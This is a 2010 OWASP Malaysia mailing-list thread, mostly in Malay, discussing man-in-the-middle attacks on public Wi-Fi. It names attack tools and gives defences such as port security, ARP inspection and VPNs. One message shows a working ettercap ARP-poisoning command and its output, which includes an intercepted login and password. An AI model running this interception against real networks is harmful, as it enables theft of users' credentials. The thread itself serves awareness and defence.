[Owasp-Malaysia] Man In The Middle Attack Wireless

MASOKIS masokis at gmail.com
Fri Sep 24 14:49:12 EDT 2010


topik ni agak menarik..  ada fail pcap victim  ? boleh saya tgk apa bezannya
MiTM dgn connection yg real.

On Sat, Sep 25, 2010 at 2:39 AM, Amir Haris <amirharis at gmail.com> wrote:

> Masokis,
>
> Kalau network sendiri mungkin kita bleh control. Untuk protect switch dari
> switch flood/gratuitous ARPs adalah dengan Contoh
> - Aktifkan port-level security pada switch
> - Aktifkan Dynamic ARP Inspection
> - Gunakan network level encryption (IPsec, VPN).
>
> Akan tetapi kita guna open public network... So di luar kawalan..
>
> rgds
>
>
> On Sat, Sep 25, 2010 at 2:16 AM, MASOKIS <masokis at gmail.com> wrote:
>
>> kat indonesia siap buat bengkel lagi..wow...
>> firewall tak mampu nak halang ke MiTM  ni ?
>>
>>
>> On Sat, Sep 25, 2010 at 1:34 AM, Faizul <faizul at mysecurity.my> wrote:
>>
>>>
>>> kalau nak selamat sekurangnya ada jugak la antivirus, internet security
>>> dan lain-lain.
>>> sekurang-kurangnya mencabar sikit kalau sapa nak hack ke nak apa ke.
>>> ini kosong je, bogel sapa tak stim. kalau askar nak gi perang bogel tak
>>> pakai baju pun paling ciput ada rifle dengan peluru jugak.
>>> guna broadband sendiri pun orang boleh tengok jgk, tp kena ada device
>>> yang canggih baru boleh, spisis gsm interceptor dan lain-lain.
>>> ada terbaca pasal GSM hacking ? A5/1 ? USRP ? openbts ? benda tu pun
>>> ramai jugak berminat. kat indonesia ramai dah try main-main dgn benda ni.
>>>
>>>
>>>
>>> On Sat, Sep 25, 2010 at 12:18 AM, Amir Haris <amirharis at gmail.com>wrote:
>>>
>>>> This paper is quite old, but it helps us to understand on how to detect
>>>> sniffer.
>>>>
>>>> www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf
>>>>
>>>>
>>>>
>>>> On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran <
>>>> mfazliazran at gmail.com> wrote:
>>>>
>>>>> Hebat Guru Faizul nie buat live hack.. . memandangkan open network
>>>>> memang bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai yang
>>>>> memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar akan
>>>>> kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh pengguna yang
>>>>> rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka tak
>>>>> tau.
>>>>>
>>>>> Tapi please consider use VPN kalau nak masuk ke open network nie..
>>>>> maybe akan banyak membantu anda untuk protect laptop anda dari di sniffer
>>>>> yang senantiasa membaca packet anda...
>>>>>
>>>>> Pastikan anda delete semua cookie yang ada dalam browser anda sebelum
>>>>> connect ke wifi tersebut. Pastikan yer!!
>>>>>
>>>>> Kalau untuk pengguna window tegar boleh try guna Hotspot Shield<http://anchorfree.com/downloads/hotspot-shield/>ini. banyak kebaikannya... amin!!! dah ada untuk iphone la .. boleh download
>>>>> untuk peminat2 iphone. :)
>>>>>
>>>>> Pastikan laptop anda tidak ada buat public file sharing.. pastikan
>>>>> tau!!!
>>>>>
>>>>> Last jangan connect terlampau lama dengan open network ni lagi lama
>>>>> anda connect lagi banyak information hackers2 ni dapat. Pastikan anda tidak
>>>>> leka dan lalai yer!!!
>>>>>
>>>>> Sebenarnya banyak lagi software yang boleh digunakan untuk protect
>>>>> laptop anda jika anda banyak explore dan menyelidik sedikit sebanyak tentang
>>>>> cara nak protect laptop anda especially untuk pengguna windows.. tapi jangan
>>>>> sangka pulak pengguna OS lain boleh terlepas... huhuhu.
>>>>>  P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch,
>>>>> Arpsnmp atau DecaffeinatID anda mesti menyukainya.. :P
>>>>> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <faizul at mysecurity.my> wrote:
>>>>>
>>>>>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah
>>>>>> target dan 254 adalah gateway
>>>>>>
>>>>>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau
>>>>>> dragon
>>>>>>
>>>>>> Listening on eth0... (Ethernet)
>>>>>>
>>>>>>   eth0 ->       00:0C:29:97:59:E4          10.1.1.1     255.255.255.0
>>>>>>
>>>>>> Privileges dropped to UID 0 GID 0...
>>>>>>
>>>>>>   28 plugins
>>>>>>   39 protocol dissectors
>>>>>>   53 ports monitored
>>>>>> 7587 mac vendor fingerprint
>>>>>> 1698 tcp OS fingerprint
>>>>>> 2183 known services
>>>>>>
>>>>>> Scanning for merged targets (2 hosts)...
>>>>>>
>>>>>> * |==================================================>| 100.00 %
>>>>>>
>>>>>> 2 hosts added to the hosts list...
>>>>>>
>>>>>> ARP poisoning victims:
>>>>>>
>>>>>>  GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92
>>>>>>
>>>>>>  GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6
>>>>>> Starting Unified sniffing...
>>>>>>
>>>>>>
>>>>>> Text only Interface activated...
>>>>>> Hit 'h' for inline help
>>>>>>
>>>>>> HTTP : 74.125.127.99:443 -> USER: 9w2pju  PASS: selamathariraya
>>>>>> INFO:
>>>>>> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3
>>>>>>
>>>>>>
>>>>>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <amirharis at gmail.com>wrote:
>>>>>>
>>>>>>> Haris,
>>>>>>>
>>>>>>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar...
>>>>>>>
>>>>>>>
>>>>>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <hazrul at hazrulnz.net>wrote:
>>>>>>>
>>>>>>>>  Based on the blog post, plenty of tools can be used to perform such
>>>>>>>> attacks. Nowadays tools are getting more "user friendly" and yeah
>>>>>>>> since
>>>>>>>> he's using insecure Wifi facility -visible network packets/traffics
>>>>>>>> -
>>>>>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with
>>>>>>>> ferret and hamster is much more easier. But based on the symptoms or
>>>>>>>> the
>>>>>>>> screenshots, it is more monkey in the middle attack compared to
>>>>>>>> sidejacking (I prefer this one).
>>>>>>>>
>>>>>>>> So, never access your private accounts using insecure or open ap
>>>>>>>> wireless environment. Guna la broadband.. :D
>>>>>>>>
>>>>>>>> p/s: besides I believe nobody actually read/understand/concern on
>>>>>>>> the
>>>>>>>> warning popups regarding the cert validity. Usually we just click
>>>>>>>> "Add
>>>>>>>> exception" and "proceed" :D
>>>>>>>>
>>>>>>>> That's my 2 halala
>>>>>>>>
>>>>>>>> Thanks
>>>>>>>>
>>>>>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote:
>>>>>>>> > There is https/ssl mitm in the cain & abel using fake
>>>>>>>> private/public key. It intercepts the ssl handshake and providing the fake
>>>>>>>> key (if the key is not trusted) to the client. In my previous test, my
>>>>>>>> friend realized a fake ssl for maybank site when I'm running the attack, and
>>>>>>>> he told me maybank has been hacked (but not). For wireless (not ethernet)
>>>>>>>> layer 2, there is utility like airpwn and karma for this kind of attack. I
>>>>>>>> haven't read yet the blog but to answer first the question. Wallahualam.
>>>>>>>> > Sent from my BlackBerry® smartphone
>>>>>>>> >
>>>>>>>> > -----Original Message-----
>>>>>>>> > From: Harisfazillah Jamel <linuxmalaysia at gmail.com>
>>>>>>>> > Sender: owasp-malaysia-bounces at lists.owasp.org
>>>>>>>> > Date: Fri, 24 Sep 2010 19:21:31
>>>>>>>> > To: owasp-malaysia<owasp-malaysia at lists.owasp.org>
>>>>>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless
>>>>>>>> >
>>>>>>>> > Tittle should be man in the minddle attack..
>>>>>>>> >
>>>>>>>> > ettercap can be used to capture packet. But its hard to get our
>>>>>>>> > password in HTTPS protocol. I believe a kind of proxy is used for
>>>>>>>> > this.
>>>>>>>> >
>>>>>>>> > Any idea what kind of proxy?
>>>>>>>> >
>>>>>>>> >
>>>>>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote:
>>>>>>>> >> ARP poisoning can be used.ettercap
>>>>>>>> >>
>>>>>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" <
>>>>>>>> linuxmalaysia at gmail.com> wrote:
>>>>>>>> >>> Assalamualaikum and salam sejahtera,
>>>>>>>> >>>
>>>>>>>> >>> Would like to share this blog post.
>>>>>>>> >>>
>>>>>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/
>>>>>>>> >>>
>>>>>>>> >>> How man in the middle attack can be used in this case?
>>>>>>>> >>>
>>>>>>>> >>> Thanks.
>>>>>>>> > _______________________________________________
>>>>>>>> > Owasp-Malaysia mailing list
>>>>>>>> > Owasp-Malaysia at lists.owasp.org
>>>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>>>> >
>>>>>>>> > OWASP Malaysia Wiki
>>>>>>>> > http://www.owasp.org/index.php/Malaysia
>>>>>>>> >
>>>>>>>> > OWASP Malaysia Wiki Facebook
>>>>>>>> >
>>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>>>> > _______________________________________________
>>>>>>>> > Owasp-Malaysia mailing list
>>>>>>>> > Owasp-Malaysia at lists.owasp.org
>>>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>>>> >
>>>>>>>> > OWASP Malaysia Wiki
>>>>>>>> > http://www.owasp.org/index.php/Malaysia
>>>>>>>> >
>>>>>>>> > OWASP Malaysia Wiki Facebook
>>>>>>>> >
>>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>>>> >
>>>>>>>>
>>>>>>>> _______________________________________________
>>>>>>>> Owasp-Malaysia mailing list
>>>>>>>> Owasp-Malaysia at lists.owasp.org
>>>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>>>>
>>>>>>>> OWASP Malaysia Wiki
>>>>>>>> http://www.owasp.org/index.php/Malaysia
>>>>>>>>
>>>>>>>> OWASP Malaysia Wiki Facebook
>>>>>>>>
>>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> Owasp-Malaysia mailing list
>>>>>>> Owasp-Malaysia at lists.owasp.org
>>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>>>
>>>>>>> OWASP Malaysia Wiki
>>>>>>> http://www.owasp.org/index.php/Malaysia
>>>>>>>
>>>>>>> OWASP Malaysia Wiki Facebook
>>>>>>>
>>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> 73 de 9W2PJU
>>>>>>
>>>>>> http://9w2pju.blogspot.com
>>>>>>
>>>>>>
>>>>>> _______________________________________________
>>>>>> Owasp-Malaysia mailing list
>>>>>> Owasp-Malaysia at lists.owasp.org
>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>>
>>>>>> OWASP Malaysia Wiki
>>>>>> http://www.owasp.org/index.php/Malaysia
>>>>>>
>>>>>> OWASP Malaysia Wiki Facebook
>>>>>>
>>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>>
>>>>> Mohd Fazli Azran
>>>>> Pengguna Internet Tegar
>>>>>
>>>>> _______________________________________________
>>>>> Owasp-Malaysia mailing list
>>>>> Owasp-Malaysia at lists.owasp.org
>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>>
>>>>> OWASP Malaysia Wiki
>>>>> http://www.owasp.org/index.php/Malaysia
>>>>>
>>>>> OWASP Malaysia Wiki Facebook
>>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> Owasp-Malaysia mailing list
>>>> Owasp-Malaysia at lists.owasp.org
>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>
>>>> OWASP Malaysia Wiki
>>>> http://www.owasp.org/index.php/Malaysia
>>>>
>>>> OWASP Malaysia Wiki Facebook
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>
>>>
>>>
>>>
>>> --
>>> 73 de 9W2PJU
>>>
>>> http://9w2pju.blogspot.com
>>>
>>>
>>> _______________________________________________
>>> Owasp-Malaysia mailing list
>>> Owasp-Malaysia at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>
>>> OWASP Malaysia Wiki
>>> http://www.owasp.org/index.php/Malaysia
>>>
>>> OWASP Malaysia Wiki Facebook
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>
>>
>>
>>
>>  --
>> *>> HTTP://WWW.MASOKIS.COM <<*
>>
>>
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>



-- 
*>> HTTP://WWW.MASOKIS.COM <<*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20100925/d072080c/attachment-0001.html 


More information about the Owasp-Malaysia mailing list